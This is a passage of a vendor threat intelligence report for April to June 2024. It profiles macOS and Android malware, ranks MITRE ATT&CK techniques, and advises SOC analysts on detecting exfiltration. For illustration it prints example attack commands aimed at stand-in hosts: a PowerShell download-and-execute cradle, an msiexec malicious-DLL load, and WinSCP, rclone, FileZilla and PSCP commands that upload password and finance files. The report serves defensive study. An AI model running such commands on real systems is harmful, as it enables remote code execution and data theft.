XMRig continues to be a popular tool for mining cryptocurrency such as Monero due to its high performance and open-source nature. It is often deployed by threat actors once initial access to a system has been gained and used to mine crypto without the victim’s knowledge.

Prevalent Threats by Platform: macOS

Stealer

Discovered and named by Kandji’s threat research team in April, Cuckoo Stealer is distributed as a malicious disk image (DMG) file which contains spyware and infostealer capabilities. Since its discovery, Cuckoo Stealer has seen a sharp rise in new samples of the malware appearing in the wild.

Stealer

Atomic Stealer (aka AMOS) remains prevalent with many new variants spotted in the wild. The new variants disguise themselves as various apps which are distributed via disk images. AMOS is a stealer which targets passwords, browser cookies, autofill data, crypto wallets and Mac keychain data.

Backdoor

A malicious attack which utilizes the Python Package Index (PyPI) has been discovered by researchers. The malware utilizes the PyPI library to install a Sliver C2 payload on the target machine. The package is written in the Go programming language and uses steganography in a Portable Networks Graphic (PNG) file to carry out the attack.

Stealer

This malware spreads by utilizing malicious Google ads for the Arc web browser. These ads trick the victim into downloading a malicious DMG installer file which begins the infection process, dropping the malware to the machine. Poseidon has the ability to harvest user credentials, VPN configurations and cryptocurrency wallets.

Prevalent Threats by Platform: Android

Infostealer

This infostealer utilizes the Android Accessibility Service to capture user data and send captured data to its C2 server. SpyNote includes the functionality to click/long-click, take screenshots and lock the victim’s screen.

Backdoor/Ransomware

Rafel RAT is distributed as a trojan application or through phishing campaigns. Its capabilities include C2, location tracking, redirect device notifications, and extracting personal SMS messages and call logs from the target device.

Infostealer

SoumniBot steals banking keys and plunders victims’ bank accounts. The malware exploits a validation issue in the Android manifest and steals information that it uploads to a remote server.

Infostealer

Vultur has been distributed through trojan applications and “smishing” (SMS phishing) social engineering techniques. In addition to data exfiltration, a threat actor can use Vultur to make changes to the file system, modify execution permissions, and control the infected device using Android Accessibility Services.

Common MITRE Techniques

Understanding threat groups’ high-level techniques can aid in deciding which detection techniques should be prioritized. BlackBerry observed the following top 20 techniques being used by threat actors in this reporting period.
 

Detected Techniques

The following table shows the top 20 techniques. An upward arrow (↑) in the “change” column indicates that usage of the technique has increased since our last report. A downward arrow (↓) indicates that usage has decreased since our last report. An equals (=) symbol means that the technique remains in the same position as in our last report.

Technique Name Technique ID Tactic Name Last Report Change
Hijack Execution Flow
T1574
Persistence, Privilege Escalation, Defense Evasion
NA
DLL Side-Loading
T1574.002
Persistence, Privilege Escalation, Defense Evasion
3
Process Injection
T1055
Privilege Escalation, Defense Evasion
1
Input Capture
T1056
Credential Access, Collection
4
=
System Information Discovery
T1082
Discovery
2
Software Discovery
T1518
Discovery
NA
Security Software Discovery
T1518.001
Discovery
5
Process Discovery
T1057
Discovery
8
File and Directory Discovery
T1083
Discovery
7
Masquerading
T1036
Defense Evasion
6
Application Layer Protocol
T1071
Command-and-control
9
Non-Application Layer Protocol
T1095
Command-and-control
11
Remote System Discovery
T1018
Discovery
12
Boot or Logon Autostart Execution
T1547
Persistence, Privilege Escalation
NA
Registry Run Keys / Startup Folder
T1547.001
Persistence, Privilege Escalation
10
Application Window Discovery
T1010
Discovery
13
Impair Defenses
T1562
Defense Evasion
NA
Disable or Modify Tools
T1562.001
Defense Evasion
17
Scheduled Task/Job
T1053
Execution, Persistence, Privilege Escalation
15
Data from Local System
T1005
Collection
NA
Technique ID
Hijack Execution Flow
T1574
DLL Side-Loading
T1574.002
Process Injection
T1055
Input Capture
T1056
System Information Discovery
T1082
Software Discovery
T1518
Security Software Discovery
T1518.001
Process Discovery
T1057
File and Directory Discovery
T1083
Masquerading
T1036
Application Layer Protocol
T1071
Non-Application Layer Protocol
T1095
Remote System Discovery
T1018
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Application Window Discovery
T1010
Impair Defenses
T1562
Disable or Modify Tools
T1562.001
Scheduled Task/Job
T1053
Data from Local System
T1005
Tactic Name
Hijack Execution Flow
Persistence, Privilege Escalation, Defense Evasion
DLL Side-Loading
Persistence, Privilege Escalation, Defense Evasion
Process Injection
Privilege Escalation, Defense Evasion
Input Capture
Credential Access, Collection
System Information Discovery
Discovery
Software Discovery
Discovery
Security Software Discovery
Discovery
Process Discovery
Discovery
File and Directory Discovery
Discovery
Masquerading
Defense Evasion
Application Layer Protocol
Command-and-control
Non-Application Layer Protocol
Command-and-control
Remote System Discovery
Discovery
Boot or Logon Autostart Execution
Persistence, Privilege Escalation
Registry Run Keys / Startup Folder
Persistence, Privilege Escalation
Application Window Discovery
Discovery
Impair Defenses
Defense Evasion
Disable or Modify Tools
Defense Evasion
Scheduled Task/Job
Execution, Persistence, Privilege Escalation
Data from Local System
Collection
Last Report
Hijack Execution Flow
NA
DLL Side-Loading
3
Process Injection
1
Input Capture
4
System Information Discovery
2
Software Discovery
NA
Security Software Discovery
5
Process Discovery
8
File and Directory Discovery
7
Masquerading
6
Application Layer Protocol
9
Non-Application Layer Protocol
11
Remote System Discovery
12
Boot or Logon Autostart Execution
NA
Registry Run Keys / Startup Folder
10
Application Window Discovery
13
Impair Defenses
NA
Disable or Modify Tools
17
Scheduled Task/Job
15
Data from Local System
NA
Change
Hijack Execution Flow
DLL Side-Loading
Process Injection
Input Capture
=
System Information Discovery
Software Discovery
Security Software Discovery
Process Discovery
File and Directory Discovery
Masquerading
Application Layer Protocol
Non-Application Layer Protocol
Remote System Discovery
Boot or Logon Autostart Execution
Registry Run Keys / Startup Folder
Application Window Discovery
Impair Defenses
Disable or Modify Tools
Scheduled Task/Job
Data from Local System

Using MITRE D3FEND, the BlackBerry Threat Research and Intelligence Team has developed a complete list of countermeasures for the techniques observed during this reporting period, which is available in our public GitHub. Adversaries use the top three most well-known techniques to gather key information to conduct successful attacks. In the Applied Countermeasures section, we discuss some examples of their usage and useful information to monitor. The impact rating of the total of techniques and tactics can be seen in this figure.

Figure 17: Observed MITRE ATT&CK Techniques, April to June 2024.

Detected Tactics

In this reporting period, there are two tactics with the same percentage of observations, Privilege Escalation and Defense Evasion, with 23%, followed by Discovery with 19%. These are the same top tactics from the previous period.

Figure 18: Observed MITRE ATT&CK Tactics, April to June 2024.

CylanceMDR Data

This section of the report highlights the top interesting threat detections observed in CylanceMDR customer environments that were targeted by a threat during this reporting period.

CylanceMDR is a subscription-based managed detection and response (MDR) service that provides 24x7 monitoring. It helps organizations stop sophisticated cyberthreats seeking gaps in the customer’s security programs. The BlackBerry MDR team tracked thousands of alerts over this reporting period. Below, we break down the telemetry region-by-region to provide additional insight into the current threat landscape.

Figure 19: Top five CylanceMDR alerts by region.

CylanceMDR Observations

During this reporting period, similar to the last report, the CylanceMDR team observed that Certutil remained a large detection source for the security operations center (SOC) across all regions.

In the North America/Latin America (NALA) and EMEA regions, we also noticed a trend of activity related to ‘PowerShell Download’ detections. For example, we saw adversaries trying to achieve the MITRE technique Ingress Tool Transfer (T1105) by using download cradles via PowerShell such as powershell.exe -noexit -ep bypass -command IEX((New-Object System.Net.WebClient).DownloadString(‘hxxps://SourceofEvil/test[.]ps1’)).

Additionally, we observed an uptick in Base64 encoded detections which was not as prevalent in our previous report’s findings. Base64 encoding provides a relatively easy way for a threat actor to obfuscate code, disguising malicious code and potentially making it less detectable. However, most seasoned analysts are well aware of the use of Base64 by threat actors, so extra vigilance and detection capabilities are usually incorporated into more mature SOCs to identify this evasion technique.

Of particular interest in the NALA and APAC region, we started to observe some more detections related to ‘Possible Msiexec Abuse via DLL Load’ this reporting period. Msiexec is a command-line utility in Windows that is commonly associated with executing .msi installation packages. Our system detects threat actors trying to abuse Msiexec to proxy execute a malicious DLL payload (MITRE technique T1218.007). An example of a command seen is: ‘C:\windows\system32\msiexec.exe /Z c:\programdata\evil.dll’.

LOLBAS Activity

During this reporting period, we observed the following living-off-the-land binaries, scripts and libraries (LOLBAS) activity:

  • Bitsadmin continues to be the highest observed LOLBAS.
  • Certutil is a close second and has increased since the last reporting period.
  • Regsvr32, MSHTA and MOFCOMP are still being observed but overall represent a low percentage.
Figure 20: LOLBAS activity, April to June 2024.

Exfiltration Tools

In our previous report, we discussed remote monitoring and management (RMM) tools and how they are often abused by threat actors. RMM tools provide an easy way for an attacker to maintain persistence and ease of access, and also provide a way to easily exfiltrate data from customer environments. In fact, researchers have reported that RMM tools are the fastest growing category for ransomware groups to exfiltrate from victim environments.

Staying on the topic of exfiltration, during this reporting period, CylanceMDR reviewed the most prevalent tools that could be used for exfiltration (not including RMM tools) in our customer environments.

Figure 21: Exfiltration tools detected by CylanceMDR.

Tools

WinSCP

Description: WinSCP is a file transfer client; PuTTY is a secure shell (SSH) client.

Example Command-Line: winscp.exe scp://test: P@ss123[at]EvilHost[.]com:2222/ /upload passwords.txt /defaults=auto

Note: Commonly used with a Graphical User Interface (GUI)

MITRE ATT&CK ID: T1048

Rclone

Description: Rclone is a command-line utility that is used to manage content on cloud storage (i.e., allowing the transfer of files in the cloud)

Example Command-Line: rclone.exe copy “\\SERVER\passwords\ ftp:EvilCorp\files” -q --transfers 10

MITRE ATT&CK ID: S1040

FileZilla

Description: FileZilla is a well-known file transfer protocol (FTP) tool that can be used across various operating systems.

Example Command-Line: filezilla.exe -u “ftp://test:p@ss1234[at]ftp.test[.]com” -e “put passwords.txt /remote_directory/pass.txt”

MITRE ATT&CK ID: T1071.002

PSCP

Description: PuTTY Secure Copy Protocol (PSCP) is a command-line utility used for transferring files and folders.

Example Command-Line: pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp

MITRE ATT&CK ID: T1021.004

FreeFileSync

Description: FreeFileSync is a synchronization tool that can be used to manage backups.

Example Command-Line: FreeFileSync.exe google_drive_sync.ffs_batch

Note: The batch file will contain information regarding the file/folder and the location of the GDrive folder e.g., <Left Path=“C:\sensitiveFiles” /> <Right Path=“D:\GoogleDriveFolder” />

MITRE ATT&CK ID: T1567.002

Key Takeaways

The above list of tools is not exhaustive, as there are many variations of tools used for the purpose of exfiltration. Therefore, it is important for organizations to have a strategy to defend against the use of tools that may be used for a malicious purpose.

These strategies may include:

  • Data loss prevention (DLP) tools for detecting and preventing the loss, misuse or sharing of sensitive data via a breach, and unauthorized use or exfiltration.
  • Encryption at rest and in transit.
  • Access controls.
  • “Least privilege” settings. Only provide access to what is needed.
  • Regularly auditing accounts — e.g., if a user changes a role, they may have access to data they no longer need.
  • Network segmentation, for in a breach, well-defined network segments will impede lateral movement and reduce the attack surface.
  • Intrusion detection systems to monitor network traffic.
  • Applying default-deny approach — only enable as required. For example:
    • Blocking the use of USB ports or cloud storage services. (e.g., Using group policy objects (GPO) to disable data transfer on USB ports.)
    • Ports should not be exposed publicly to the Internet (i.e., Port 22 (SSH) should not be open outbound to the Internet).
    • Reduce overall risk by limiting port, protocol and service use.
  • Monitoring outbound traffic patterns, such as:
    • Increased traffic outside normal operating hours (deviating from the normal baseline).
    • A sudden increase of outbound traffic over port 22 could indicate exfiltration using a tool like pscp.exe.
      • As stated above, ports such as 22 should apply a default-deny approach to prevent such risks.
  • Placing controls to monitor for outbound attempts on ports or services that have been disabled.
    • For example, if a threat actor gains access to a network and attempts to enable these ports or services for use, then such controls will alert the security team.         

From a SOC analyst perspective, here are some examples of what analysts should be aware of:

Tool Renaming

Analysts need to be aware of commonly used exfiltration tools and their options and parameters. Using the Rclone example — ‘rclone.exe copy “\\SERVER\passwords\ ftp:EvilCorp\files” -q --transfers 10’ — a threat actor may rename this to something more innocuous like - ‘svchost.exe copy “\\SERVER\passwords\ ftp:EvilCorp\files” -q --transfers 10’.

Data Transfer Volume

If there is a large data transfer or a sudden increase in outbound traffic, analysts should investigate, especially if the transfer occurs outside core business hours.

Anomalous Traffic

Be wary of an unexpected pattern of data transfers from unknown IPs or hosts.

User Behavior Analytics

Watch for patterns that deviate from the norm, such as a user accessing files that they would usually have no need to access. An example would be a marketing team member’s host accessing customer financial records.

Conclusion and Forecasts

This 90-day report, covering April through June 2024, is designed to help you stay informed and prepared for future threats. High-profile crime groups, especially ransomware operators, are exploiting new vulnerabilities and finding value in targets large and small. As the report noted, BlackBerry researchers observed an average of over 11,500 unique malware hashes caught daily. This level of activity makes it crucial to stay current with the latest security news for your industry and region.

Given the current state of cyberthreats, we forecast the following threats in the coming months:

Election Interference
Globally, 2024 is a significant year for elections, as about 60% of the world’s population is expected to vote. Misinformation, disinformation, and interference attempts have already been observed throughout the year, including threats via the relatively new medium of deepfakes. Malicious actors are increasingly trying to seize the moment to sow confusion, foment social divisions and cause disruption. We predict they will intensify their campaigns to spread fake news and misinformation, escalating their efforts as each election approaches.

Politically Charged Phishing Lures
The abuse of politically charged posts, forums and mailing lists to spread malware could soon become a weaponized tactic. By leveraging polarizing opinions from various political circles, threat actors might exploit this chaos to distribute political materials infected with trojans, deploying even more malware. Common tactics include creating social media posts that sow disinformation and generate millions of clicks, views and engagements across social media platforms, instant messengers and traditional news media. Many threat actors may use these social media activities as lures to conduct malware attacks.

The Weaponization of Chaos
In the realm of cybersecurity, any type of chaos serves as a fertile ground for malicious actors to exploit confusion and misinformation. Whether during wars, natural disasters, IT outages, or any significant disruption to the normal flow of communications and data, periods of instability provide ample opportunities for cybercriminals. Threat actors are poised to continually leverage such situations by disseminating fake phishing emails, misleading forum posts, and malicious software posing as helpful and contextually relevant tools.

Ransomware Evolution and AI
Facing increased scrutiny from law enforcement, lawmakers, and security professionals worldwide, ransomware threat actors are likely to evolve their tactics, techniques and procedures (TTPs) to continue their operations.

This evolution may involve leveraging AI (particularly generative AI) to develop more sophisticated and armored payloads and execution chains, utilizing deepfake technology for advanced and targeted social engineering attacks, decentralizing and anonymizing network and C2 infrastructure to evade tracking and shutdown, and improving operational security.

Visit the BlackBerry blog to stay current with the fluid landscape of cybersecurity threats and defenses.

Acknowledgements

This report represents the collaborative efforts of our talented teams and individuals. In particular, we would like to recognize:

We would also like to thank the Royal Canadian Mounted Police’s National Cybercrime Coordination Centre for their contribution and collaboration.  

Legal Disclaimer

The information contained in the BlackBerry Global Threat Intelligence Report is intended for informational purposes only. BlackBerry does not guarantee or take responsibility for the accuracy, completeness and reliability of any third-party statements or research referenced herein. The analysis expressed in this report reflects the current understanding of available information by our research analysts and may be subject to change as additional information is made known to us. Readers are responsible for exercising their own due diligence when applying this information to their private and professional lives. BlackBerry does not condone any malicious use or misuse of information presented in this report.